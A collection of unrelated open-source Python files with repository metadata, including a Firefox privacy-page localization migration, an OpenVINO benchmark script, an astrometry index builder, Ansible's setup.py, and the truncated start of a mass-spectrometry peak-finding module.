parser.add_argument("-f","--format",default="list",choices=["summary","list","extensive"],help="Output-format") parser.add_argument("-g","--long-gene-size",default=200000,type=int,help="Gene-name based matching is more sensitive to long genes. This is the gene size used to mark fusion genes spanning a 'long gene' as reported the output. Use 0 to disable this feature.") parser.add_argument("-o","--output",help="output filename; '-' for stdout",default="output_fuma.txt") if(argv == None): return parser.parse_args() else: # Argumented parameters are used in the unit tests. return parser.parse_args(argv) def CLI_ensmble_gtf_to_bed_converter(argv=None): """ CLI for gtf to bed converter """ parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,epilog="For more info please visit:\n<https://github.com/yhoogstrate/fuma>") parser.add_argument('-V','--version', action='version', version=textwrap.dedent("%(prog)s "+fuma.__version__+"\n\nCopyright (C) 2013-"+str(datetime.datetime.now().year)+" Youri Hoogstrate.\n\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n")) parser.add_argument("-o","--output",help="output filename; '-' for stdout",default="-") parser.add_argument("genecode_gtf_file",nargs=1,help="Input GTF file, e.g. 'gencode_gtf_file.gtf' - not as .gz") if(argv == None): return parser.parse_args() else: # Argumented parameters are used in the unit tests. return parser.parse_args(argv)
ErasmusMC-Bioinformatics/fuma
fuma/CLI.py
Python
gpl-3.0
7,199
[ "VisIt" ]
700cca22b00a9f33cf54a0ce73a72d40e5fa474566e757505260c69ed627b4f6
from __future__ import absolute_import import fluent.syntax.ast as FTL from fluent.migrate.helpers import transforms_from from fluent.migrate.helpers import VARIABLE_REFERENCE, TERM_REFERENCE from fluent.migrate import REPLACE, COPY privacy_hub = "firefox/privacy-hub.lang" def migrate(ctx): """Migrate bedrock/firefox/templates/firefox/privacy/base.html, part {index}.""" ctx.add_transforms( "firefox/privacy-hub.ftl", "firefox/privacy-hub.ftl", [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-privacy-promise"), value=REPLACE( privacy_hub, "Firefox Privacy Promise", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-takes-less-data-keeps"), value=REPLACE( privacy_hub, "Firefox takes less data, keeps it safe, and with no secrets.", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-products-are-designed"), value=REPLACE( privacy_hub, "Firefox products are designed to protect your <strong>privacy</strong>", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), ] + transforms_from(""" firefox-privacy-privacy = {COPY(privacy_hub, "Privacy",)} firefox-privacy-our-promise = {COPY(privacy_hub, "Our Promise",)} firefox-privacy-our-products = {COPY(privacy_hub, "Our Products",)} firefox-privacy-hub-you-should-be-able-to-decide = {COPY(privacy_hub, "You should be able to decide who sees your personal info. Not just among your friends, but with every advertiser and company on the internet — including us.",)} firefox-privacy-hub-thats-why-everything-we-make = {COPY(privacy_hub, "That’s why everything we make and do honors our Personal Data Promise",)} firefox-privacy-hub-take-less = {COPY(privacy_hub, "Take Less",)} firefox-privacy-hub-we-make-a-point-of-knowing = {COPY(privacy_hub, "We make a point of knowing less about you",)} firefox-privacy-hub-all-tech-companies-collect = {COPY(privacy_hub, "All tech companies collect data to improve their products. But it doesn’t need to include so much of your personal info. The only data we want is the data that serves you in the end. We ask ourselves: do we actually need this? What do we need it for? And when can we delete it?",)} firefox-privacy-hub-keep-it-safe = {COPY(privacy_hub, "Keep it safe",)} firefox-privacy-hub-we-do-the-hard-work-to-protect = {COPY(privacy_hub, "We do the hard work to protect your personal info",)} firefox-privacy-hub-data-security-is-complicated = {COPY(privacy_hub, "Data security is complicated — or at least it should be. Which is why we take the extra steps to classify the data we have, maintain rules for how we store and protect each type, and never stop iterating on our processes. We prioritize your privacy. We invest in it. We’re committed to it. We even teach other companies how to do it.",)} firefox-privacy-hub-no-secrets = {COPY(privacy_hub, "No secrets",)} firefox-privacy-hub-youll-always-know-where-you = {COPY(privacy_hub, "You’ll always know where you stand with us",)} """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-theres-no-hidden-agenda-here"), value=REPLACE( privacy_hub, "There’s no hidden agenda here. Our business doesn’t depend on secretly abusing your trust. Our <a href=\"%(privacy)s\">Privacy Notice</a> is actually readable. Anyone in the world can attend our <a href=\"%(meetings)s\">weekly company meetings</a>. If you want to dig into every datapoint we collect, our code is open. And so are we.", { "%%": "%", "%(privacy)s": VARIABLE_REFERENCE("privacy"), "%(meetings)s": VARIABLE_REFERENCE("meetings"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-why-trust-firefox"), value=REPLACE( privacy_hub, "Why trust Firefox?", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-because-we-put-people-first"), value=REPLACE( privacy_hub, "Because we put people first. In fact, we’re backed by a <a href=\"%(foundation)s\">non-profit</a>. From day one, it’s been our mission to protect the internet and everyone on it", { "%%": "%", "%(foundation)s": VARIABLE_REFERENCE("foundation"), } ) ), ] + transforms_from(""" firefox-privacy-hub-learn-more-about-our-mission = {COPY(privacy_hub, "Learn more about our mission",)} firefox-privacy-hub-your-privacy-by-the-product = {COPY(privacy_hub, "Your privacy, by the product",)} """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-products-work-differently"), value=REPLACE( privacy_hub, "Firefox products work differently — because they’re designed to protect your privacy first.", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), ] + transforms_from(""" firefox-privacy-hub-learn-about-our-products = {COPY(privacy_hub, "Learn about our products",)} """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-privacy-by-the"), value=REPLACE( privacy_hub, "Firefox privacy, by the product", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-protects-your-privacy"), value=REPLACE( privacy_hub, "Firefox protects your privacy in every product.", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-firefox-protects-your-privacy-strong"), value=REPLACE( privacy_hub, "Firefox <strong>protects</strong> your privacy in every product", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), ] + transforms_from(""" firefox-privacy-hub-firefox-browser = { -brand-name-firefox-browser } firefox-privacy-hub-2000-trackers-blocked-automatically = {COPY(privacy_hub, "2,000+ trackers blocked — automatically",)} """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-tracking-has-become-an"), value=REPLACE( privacy_hub, "Tracking has become an epidemic online: companies follow every move, click and purchase, collecting data to predict and influence what you’ll do next. We think that’s a gross invasion of your privacy. That’s why Firefox mobile and desktop browsers have Enhanced Tracking Protection on by default.", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-if-you-want-to-see-what"), value=REPLACE( privacy_hub, "If you want to see what Firefox is blocking for you, visit this page on your Firefox desktop browser.", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-see-what-firefox-has-blocked"), value=REPLACE( privacy_hub, "See what Firefox has blocked for you", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), ] + transforms_from(""" firefox-privacy-hub-get-enhanced-tracking-protection = {COPY(privacy_hub, "Get Enhanced Tracking Protection",)} """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-download-the-firefox-browser"), value=REPLACE( privacy_hub, "Download the Firefox browser", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-update-your-firefox-browser"), value=REPLACE( privacy_hub, "Update your Firefox browser", { "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), ] + transforms_from(""" firefox-privacy-hub-invisible-to-the-top-trackers = {COPY(privacy_hub, "Invisible to the top trackers",)} firefox-privacy-hub-meet-four-of-the-most-common = {COPY(privacy_hub, "Meet four of the most common categories of trackers — who won’t meet you.",)} firefox-privacy-hub-always-in-your-control = {COPY(privacy_hub, "Always in your control",)} firefox-privacy-hub-want-to-customize-what = {COPY(privacy_hub, "Want to customize what gets blocked? Your settings are only one click away.",)} firefox-privacy-hub-protection-beyond-tracking = {COPY(privacy_hub, "Protection beyond tracking",)} """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-if-you-have-a-firefox-account"), value=REPLACE( privacy_hub, "If you have a Firefox account, you can also see how we’re helping you protect your personal info and passwords.", { "Firefox account": TERM_REFERENCE("brand-name-firefox-account"), "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-more-than-s-trackers-blocked"), value=REPLACE( privacy_hub, "More than %s trackers blocked each day for Firefox users worldwide", { "%%": "%", "%s": VARIABLE_REFERENCE("trackers"), "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), ] + transforms_from(""" firefox-privacy-hub-firefox-monitor = { -brand-name-firefox-monitor } """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-when-you-enter-your-email"), value=REPLACE( privacy_hub, "When you enter your email address in Firefox Monitor, we forget it immediately after we’ve checked for a match in known data breaches — unless you authorize us to continue monitoring new breaches for your personal information.", { "Firefox Monitor": TERM_REFERENCE("brand-name-firefox-monitor"), } ) ), ] + transforms_from(""" firefox-privacy-hub-check-for-breaches = {COPY(privacy_hub, "Check for breaches",)} firefox-privacy-hub-firefox-lockwise = { -brand-name-firefox-lockwise } """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-the-passwords-and-credentials"), value=REPLACE( privacy_hub, "The passwords and credentials you save in Firefox Lockwise are encrypted on all your devices, so not even we can see them.", { "Firefox Lockwise": TERM_REFERENCE("brand-name-firefox-lockwise"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-learn-more-about-lockwise"), value=REPLACE( privacy_hub, "Learn more about Lockwise", { "Lockwise": TERM_REFERENCE("brand-name-lockwise"), } ) ), ] + transforms_from(""" firefox-privacy-hub-firefox-send = { -brand-name-firefox-send } """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-we-cant-see-the-names-or"), value=REPLACE( privacy_hub, "We can’t see the names or content of the large files you share through Firefox Send because they’re encrypted end-to-end — you choose who sees what you send, and you can even set an expiration date and password.", { "Firefox Send": TERM_REFERENCE("brand-name-firefox-send"), } ) ), ] + transforms_from(""" firefox-privacy-hub-send-a-file = {COPY(privacy_hub, "Send a file",)} firefox-privacy-hub-pocket = { -brand-name-pocket } """, privacy_hub=privacy_hub) + [ FTL.Message( id=FTL.Identifier("firefox-privacy-hub-pocket-recommends-high"), value=REPLACE( privacy_hub, "Pocket recommends high-quality, human-curated articles without collecting your browsing history or sharing your personal information with advertisers.", { "Pocket": TERM_REFERENCE("brand-name-pocket"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-get-pocket"), value=REPLACE( privacy_hub, "Get Pocket", { "Pocket": TERM_REFERENCE("brand-name-pocket"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-your-firefox-account"), value=REPLACE( privacy_hub, "Your Firefox account", { "Firefox account": TERM_REFERENCE("brand-name-firefox-account"), "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-all-the-information-synced"), value=REPLACE( privacy_hub, "All the information synced through your Firefox account — from browser history to passwords — is encrypted. And your account password is the only key.", { "Firefox account": TERM_REFERENCE("brand-name-firefox-account"), "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-take-your-privacy-and-bookmarks"), value=REPLACE( privacy_hub, "Take your privacy and bookmarks everywhere with a Firefox account.", { "Firefox account": TERM_REFERENCE("brand-name-firefox-account"), "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-already-have-an-account"), value=REPLACE( privacy_hub, "Already have an account? <a %(sign_in)s class=\"%(class_name)s\">Sign In</a> or <a href=\"%(learn_more)s\">learn more</a> about joining Firefox.", { "%%": "%", "%(sign_in)s": VARIABLE_REFERENCE("sign_in"), "%(class_name)s": VARIABLE_REFERENCE("class_name"), "%(learn_more)s": VARIABLE_REFERENCE("learn_more"), "Firefox": TERM_REFERENCE("brand-name-firefox"), } ) ), FTL.Message( id=FTL.Identifier("firefox-privacy-hub-read-the-privacy-notice-for"), value=REPLACE( privacy_hub, "Read the <a href=\"%s\">Privacy Notice</a> for our products", { "%%": "%", "%s": VARIABLE_REFERENCE("url"), } ) ), ] )
hoosteeno/bedrock
lib/fluent_migrations/firefox/privacy.py
Python
mpl-2.0
18,195
[ "VisIt" ]
21b7be8dfd5d2f8cbad7c9cc50727951f2f2cb952740776c863474777fc4e379
#!/usr/bin/env python import click import os import sh @click.command() @click.argument('omz_network') @click.option('-s', '--skip', is_flag=True, help='skip downloading / optimizing') @click.option('-bs', '--batch_size', default=1, help='minibatch size') @click.option('-nt', '--num_threads', type=int, help='number of threads to use, defaults to #hyperthreads') @click.option('-p', '--precision', default='FP32') # TODO options @click.option('-d', '--device', default='CPU') # TODO options @click.option('--cache_dir', default='~/.cache', help='cache directory') @click.option('--model_dir', default='~/.cache/omz_models', help='model directory') @click.option('--report_dir', default='reports', help='cache directory') def benchmark_app(omz_network, skip, batch_size, num_threads, precision, device, cache_dir, model_dir, report_dir): """Downloads models from openmodelzoo and runs them in benchmark_app, optionally creating a report \b Examples: ./benchmark_ov.py resnet-50-tf ./benchmark_ov.py -bs 16 -nt 28 -p FP16 bert-base-ner ./benchmark_ov.py -d PLAIDML bert-base-ner """ model_dir = os.path.expanduser(os.path.normpath(model_dir)) cache_dir = os.path.expanduser(os.path.normpath(cache_dir)) if not skip: sh.mkdir('-p', model_dir) print( 'Downloading {0}'.format(omz_network)) #TODO(brian): make this spit out output easily sh.omz_downloader('--cache_dir={0}'.format(cache_dir), name=omz_network, o=model_dir) print('Running model optimizer on {0}'.format(omz_network)) # add_mo_arg='--disable_nhwc_to_nchw', sh.omz_converter(name=omz_network, d=model_dir, o=model_dir, precision=precision) else: print('Skipping download & conversion') print('Benchmarking...') model_path = os.path.join(model_dir, 'public', omz_network, precision, omz_network + '.xml') ba = sh.Command('../.././vendor/openvino/bin/intel64/Release/benchmark_app') ba = ba.bake(m=model_path, api='sync', t='15', b=batch_size, d=device, _long_prefix='-', _long_sep=' ') if num_threads: ba = ba.bake(nstreams=num_threads, _long_prefix='-') for line in ba(_iter=True): print(line, end='') if __name__ == '__main__': benchmark_app()
plaidml/plaidml
tools/benchmarking/benchmark_ov.py
Python
apache-2.0
2,429
[ "Brian" ]
f29a9aecd4a9ea03856278c0c20c539861e2061f3be5e25d2e2f91dd1d7fe4f1
#!/usr/bin/env python """ Script to convert catalogs from VizieR to index files using astrometry.net. See https://confluence.lsstcorp.org/display/LSWUG/Building+Astrometry.net+Index+Files for more information, especially running at lsst-dev.ncsa.illinois.edu using the ready-built LSST stack (bash --rcfile ~lsstsw/eups/bin/setups.sh). This script was adapted from the one posted here http://hsca.ipmu.jp:8080/question/238/how-to-construct-an-astrometry_net_data-catalog/ For using with the LSST stack, a single magnitude seems to be sufficient, and if not provided, magnitude errors will be using sqrt(flux). """ import numpy as np import pyfits import subprocess #infile = 'asu.fit' # output catalog from VizieR query #filter_map = {'u' : (None, None), # mapping of LSST filter to column name # 'g' : ('gmag', None), # in VizieR output file (mag, mag_err) # 'r' : ('rmag', None), # 'i' : ('imag', None), # 'z' : ('zmag', None), # 'y' : (None, None)} infile = 'asu_nomad_1.fits' # A different, but deeper catalog, filter_map = {'r' : ('Rmag', None)} # that just has r-band data. stars = True # Set False if input is a galaxy catalog ref_catalog = 'stars_nomad_1.fits' # Name of output catalog file # converted from asu.fit id = '140508' # ID for index files built from # today's date input = pyfits.open(infile) nrows = input[1].header['NAXIS2'] schema = pyfits.ColDefs([pyfits.Column(name="id", format="K"), pyfits.Column(name="ra", format="D"), pyfits.Column(name="dec", format="D"), pyfits.Column(name="starnotgal", format='I')] + [pyfits.Column(name=filt, format="E") for filt, filtcol in filter_map.items() if filtcol[0] is not None]) table = pyfits.new_table(schema, nrows=nrows) table.data.id = np.arange(nrows) table.data.ra = input[1].data.RAJ2000 # RAJ2000, DEJ2000 should be the table.data.dec = input[1].data.DEJ2000 # standard VizieR coord column names if stars: table.data.starnotgal = np.array([128]*nrows) else: table.data.starnotgal = np.array([0]*nrows) for filt, filtcol in filter_map.items(): column = table.data.field(filt) for i in range(len(column)): column[i] = input[1].data.field(filtcol[0])[i] output = pyfits.HDUList() output.append(pyfits.PrimaryHDU()) output.append(table) output.writeto(ref_catalog, clobber=True) # # The scales for the index files may need to be adjusted depending on # the density of stars in the reference catalog. # master_index_file = 'index-%(id)s00.fits' % locals() scale = 0 build_command = "build-index -i %(ref_catalog)s -o index-%(id)s00.fits -I %(id)s00 -P %(scale)i -S r -n 100 -L 20 -E -j 0.4 -r 1 > build-00.log" % locals() print build_command subprocess.call(build_command, shell=True) for scale in (1, 2, 3, 4): build_command = "build-index -1 %(master_index_file)s -o index-%(id)s%(scale)02i.fits -I %(id)s%(scale)02i -P %(scale)i -S r -L 20 -E -M -j 0.4 > build-%(scale)02i.log" % locals() print build_command subprocess.call(build_command, shell=True)
DarkEnergyScienceCollaboration/Recipes
python/utensils/make_index_files.py
Python
gpl-2.0
3,384
[ "Galaxy" ]
d7cdc8b1be6e7968d2c5ad16c17af53db73b74a0a9f355c60ad3ef117aad51d1
from __future__ import (absolute_import, division, print_function) __metaclass__ = type import json import os import os.path import re import sys import warnings from collections import defaultdict try: from setuptools import setup, find_packages from setuptools.command.build_py import build_py as BuildPy from setuptools.command.install_lib import install_lib as InstallLib from setuptools.command.install_scripts import install_scripts as InstallScripts except ImportError: print("Ansible now needs setuptools in order to build. Install it using" " your package manager (usually python-setuptools) or via pip (pip" " install setuptools).", file=sys.stderr) sys.exit(1) # `distutils` must be imported after `setuptools` or it will cause explosions # with `setuptools >=48.0.0, <49.1`. # Refs: # * https://github.com/ansible/ansible/issues/70456 # * https://github.com/pypa/setuptools/issues/2230 # * https://github.com/pypa/setuptools/commit/bd110264 from distutils.command.build_scripts import build_scripts as BuildScripts from distutils.command.sdist import sdist as SDist def find_package_info(*file_paths): try: with open(os.path.join(*file_paths), 'r') as f: info_file = f.read() except Exception: raise RuntimeError("Unable to find package info.") # The version line must have the form # __version__ = 'ver' version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", info_file, re.M) author_match = re.search(r"^__author__ = ['\"]([^'\"]*)['\"]", info_file, re.M) if version_match and author_match: return version_match.group(1), author_match.group(1) raise RuntimeError("Unable to find package info.") def _validate_install_ansible_base(): """Validate that we can install ansible-base. Currently this only cares about upgrading to ansible-base from ansible<2.10 """ if os.getenv('ANSIBLE_SKIP_CONFLICT_CHECK', '') not in ('', '0'): return # Save these for later restoring things to pre invocation sys_modules = sys.modules.copy() sys_modules_keys = set(sys_modules) # Make sure `lib` isn't in `sys.path` that could confuse this sys_path = sys.path[:] abspath = os.path.abspath sys.path[:] = [p for p in sys.path if abspath(p) != abspath('lib')] try: from ansible.release import __version__ except ImportError: pass else: version_tuple = tuple(int(v) for v in __version__.split('.')[:2]) if version_tuple < (2, 10): stars = '*' * 76 raise RuntimeError( ''' %s Cannot install ansible-base with a pre-existing ansible==%s installation. Installing ansible-base with ansible-2.9 or older currently installed with pip is known to cause problems. Please uninstall ansible and install the new version: pip uninstall ansible pip install ansible-base If you want to skip the conflict checks and manually resolve any issues afterwards, set the ANSIBLE_SKIP_CONFLICT_CHECK environment variable: ANSIBLE_SKIP_CONFLICT_CHECK=1 pip install ansible-base %s ''' % (stars, __version__, stars) ) finally: sys.path[:] = sys_path for key in sys_modules_keys.symmetric_difference(sys.modules): sys.modules.pop(key, None) sys.modules.update(sys_modules) _validate_install_ansible_base() SYMLINK_CACHE = 'SYMLINK_CACHE.json' def _find_symlinks(topdir, extension=''): """Find symlinks that should be maintained Maintained symlinks exist in the bin dir or are modules which have aliases. Our heuristic is that they are a link in a certain path which point to a file in the same directory. .. warn:: We want the symlinks in :file:`bin/` that link into :file:`lib/ansible/*` (currently, :command:`ansible`, :command:`ansible-test`, and :command:`ansible-connection`) to become real files on install. Updates to the heuristic here *must not* add them to the symlink cache. """ symlinks = defaultdict(list) for base_path, dirs, files in os.walk(topdir): for filename in files: filepath = os.path.join(base_path, filename) if os.path.islink(filepath) and filename.endswith(extension): target = os.readlink(filepath) if target.startswith('/'): # We do not support absolute symlinks at all continue if os.path.dirname(target) == '': link = filepath[len(topdir):] if link.startswith('/'): link = link[1:] symlinks[os.path.basename(target)].append(link) else: # Count how many directory levels from the topdir we are levels_deep = os.path.dirname(filepath).count('/') # Count the number of directory levels higher we walk up the tree in target target_depth = 0 for path_component in target.split('/'): if path_component == '..': target_depth += 1 # If we walk past the topdir, then don't store if target_depth >= levels_deep: break else: target_depth -= 1 else: # If we managed to stay within the tree, store the symlink link = filepath[len(topdir):] if link.startswith('/'): link = link[1:] symlinks[target].append(link) return symlinks def _cache_symlinks(symlink_data): with open(SYMLINK_CACHE, 'w') as f: json.dump(symlink_data, f) def _maintain_symlinks(symlink_type, base_path): """Switch a real file into a symlink""" try: # Try the cache first because going from git checkout to sdist is the # only time we know that we're going to cache correctly with open(SYMLINK_CACHE, 'r') as f: symlink_data = json.load(f) except (IOError, OSError) as e: # IOError on py2, OSError on py3. Both have errno if e.errno == 2: # SYMLINKS_CACHE doesn't exist. Fallback to trying to create the # cache now. Will work if we're running directly from a git # checkout or from an sdist created earlier. library_symlinks = _find_symlinks('lib', '.py') library_symlinks.update(_find_symlinks('test/lib')) symlink_data = {'script': _find_symlinks('bin'), 'library': library_symlinks, } # Sanity check that something we know should be a symlink was # found. We'll take that to mean that the current directory # structure properly reflects symlinks in the git repo if 'ansible-playbook' in symlink_data['script']['ansible']: _cache_symlinks(symlink_data) else: raise RuntimeError( "Pregenerated symlink list was not present and expected " "symlinks in ./bin were missing or broken. " "Perhaps this isn't a git checkout?" ) else: raise symlinks = symlink_data[symlink_type] for source in symlinks: for dest in symlinks[source]: dest_path = os.path.join(base_path, dest) if not os.path.islink(dest_path): try: os.unlink(dest_path) except OSError as e: if e.errno == 2: # File does not exist which is all we wanted pass os.symlink(source, dest_path) class BuildPyCommand(BuildPy): def run(self): BuildPy.run(self) _maintain_symlinks('library', self.build_lib) class BuildScriptsCommand(BuildScripts): def run(self): BuildScripts.run(self) _maintain_symlinks('script', self.build_dir) class InstallLibCommand(InstallLib): def run(self): InstallLib.run(self) _maintain_symlinks('library', self.install_dir) class InstallScriptsCommand(InstallScripts): def run(self): InstallScripts.run(self) _maintain_symlinks('script', self.install_dir) class SDistCommand(SDist): def run(self): # have to generate the cache of symlinks for release as sdist is the # only command that has access to symlinks from the git repo library_symlinks = _find_symlinks('lib', '.py') library_symlinks.update(_find_symlinks('test/lib')) symlinks = {'script': _find_symlinks('bin'), 'library': library_symlinks, } _cache_symlinks(symlinks) SDist.run(self) # Print warnings at the end because no one will see warnings before all the normal status # output if os.environ.get('_ANSIBLE_SDIST_FROM_MAKEFILE', False) != '1': warnings.warn('When setup.py sdist is run from outside of the Makefile,' ' the generated tarball may be incomplete. Use `make snapshot`' ' to create a tarball from an arbitrary checkout or use' ' `cd packaging/release && make release version=[..]` for official builds.', RuntimeWarning) def read_file(file_name): """Read file and return its contents.""" with open(file_name, 'r') as f: return f.read() def read_requirements(file_name): """Read requirements file as a list.""" reqs = read_file(file_name).splitlines() if not reqs: raise RuntimeError( "Unable to read requirements from the %s file" "That indicates this copy of the source code is incomplete." % file_name ) return reqs PYCRYPTO_DIST = 'pycrypto' def get_crypto_req(): """Detect custom crypto from ANSIBLE_CRYPTO_BACKEND env var. pycrypto or cryptography. We choose a default but allow the user to override it. This translates into pip install of the sdist deciding what package to install and also the runtime dependencies that pkg_resources knows about. """ crypto_backend = os.environ.get('ANSIBLE_CRYPTO_BACKEND', '').strip() if crypto_backend == PYCRYPTO_DIST: # Attempt to set version requirements return '%s >= 2.6' % PYCRYPTO_DIST return crypto_backend or None def substitute_crypto_to_req(req): """Replace crypto requirements if customized.""" crypto_backend = get_crypto_req() if crypto_backend is None: return req def is_not_crypto(r): CRYPTO_LIBS = PYCRYPTO_DIST, 'cryptography' return not any(r.lower().startswith(c) for c in CRYPTO_LIBS) return [r for r in req if is_not_crypto(r)] + [crypto_backend] def get_dynamic_setup_params(): """Add dynamically calculated setup params to static ones.""" return { # Retrieve the long description from the README 'long_description': read_file('README.rst'), 'install_requires': substitute_crypto_to_req( read_requirements('requirements.txt'), ), } here = os.path.abspath(os.path.dirname(__file__)) __version__, __author__ = find_package_info(here, 'lib', 'ansible', 'release.py') static_setup_params = dict( # Use the distutils SDist so that symlinks are not expanded # Use a custom Build for the same reason cmdclass={ 'build_py': BuildPyCommand, 'build_scripts': BuildScriptsCommand, 'install_lib': InstallLibCommand, 'install_scripts': InstallScriptsCommand, 'sdist': SDistCommand, }, name='ansible-base', version=__version__, description='Radically simple IT automation', author=__author__, author_email='info@ansible.com', url='https://ansible.com/', project_urls={ 'Bug Tracker': 'https://github.com/ansible/ansible/issues', 'CI: Shippable': 'https://app.shippable.com/github/ansible/ansible', 'Code of Conduct': 'https://docs.ansible.com/ansible/latest/community/code_of_conduct.html', 'Documentation': 'https://docs.ansible.com/ansible/', 'Mailing lists': 'https://docs.ansible.com/ansible/latest/community/communication.html#mailing-list-information', 'Source Code': 'https://github.com/ansible/ansible', }, license='GPLv3+', # Ansible will also make use of a system copy of python-six and # python-selectors2 if installed but use a Bundled copy if it's not. python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*', package_dir={'': 'lib', 'ansible_test': 'test/lib/ansible_test'}, packages=find_packages('lib') + find_packages('test/lib'), include_package_data=True, classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'Intended Audience :: Information Technology', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)', 'Natural Language :: English', 'Operating System :: POSIX', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Topic :: System :: Installation/Setup', 'Topic :: System :: Systems Administration', 'Topic :: Utilities', ], scripts=[ 'bin/ansible', 'bin/ansible-playbook', 'bin/ansible-pull', 'bin/ansible-doc', 'bin/ansible-galaxy', 'bin/ansible-console', 'bin/ansible-connection', 'bin/ansible-vault', 'bin/ansible-config', 'bin/ansible-inventory', 'bin/ansible-test', ], data_files=[], # Installing as zip files would break due to references to __file__ zip_safe=False ) def main(): """Invoke installation process using setuptools.""" setup_params = dict(static_setup_params, **get_dynamic_setup_params()) ignore_warning_regex = ( r"Unknown distribution option: '(project_urls|python_requires)'" ) warnings.filterwarnings( 'ignore', message=ignore_warning_regex, category=UserWarning, module='distutils.dist', ) setup(**setup_params) warnings.resetwarnings() if __name__ == '__main__': main()
computersalat/ansible
setup.py
Python
gpl-3.0
15,054
[ "Galaxy" ]
9be703630a4118b97b012ebe6dcdce2abfe9a08a7b393f42d8292d6eabaccbaa
import sys from collections import defaultdict, OrderedDict from copy import deepcopy from operator import itemgetter, attrgetter import numpy as np from pythomics.proteomics.config import CARBON_NEUTRON from scipy import optimize from scipy.signal import convolve, kaiser from .cpeaks_wrapper import ( bigauss_func, gauss_func, bigauss_ndim, gauss_ndim, bigauss_jac, gauss_jac, find_nearest, find_nearest_index, get_ppm, ) # noqa: E402 from . import ( PEAK_FINDING_REL_MAX, PEAK_FIT_MODE_AVERAGE, PEAK_FIT_MODE_FAST, PEAK_FIT_MODE_SLOW, ) # noqa: E402 from .logger import logger # noqa: E402 from .utils import ( divide_peaks, find_possible_peaks, estimate_peak_parameters, interpolate_data, savgol_smooth, subtract_baseline, ) # noqa: E402 _epsilon = np.sqrt(np.finfo(float).eps) def findEnvelope( xdata, ydata, measured_mz=None, theo_mz=None, max_mz=None, precursor_ppm=5, isotope_ppm=2.5, isotope_ppms=None, charge=2, debug=False, isotope_offset=0, isotopologue_limit=-1, theo_dist=None, label=None, skip_isotopes=None, last_precursor=None, quant_method="integrate", reporter_mode=False, fragment_scan=False, centroid=False, contaminant_search=True, ): # returns the envelope of isotopic peaks as well as micro envelopes of each individual cluster spacing = CARBON_NEUTRON / float(charge) start_mz = ( measured_mz if isotope_offset == 0 else measured_mz + isotope_offset * CARBON_NEUTRON / float(charge) ) initial_mz = start_mz if max_mz is not None: max_mz = ( max_mz - spacing * 0.9 if isotope_offset == 0 else max_mz + isotope_offset * CARBON_NEUTRON * 0.9 / float(charge) ) if isotope_ppms is None: isotope_ppms = {} tolerance = isotope_ppms.get(0, precursor_ppm) / 1000000.0 env_dict, micro_dict, ppm_dict = OrderedDict(), OrderedDict(), OrderedDict() empty_dict = {"envelope": env_dict, "micro_envelopes": micro_dict, "ppms": ppm_dict} non_empty = xdata[ydata > 0] if len(non_empty) == 0: if debug: print("data is empty") return empty_dict first_mz = 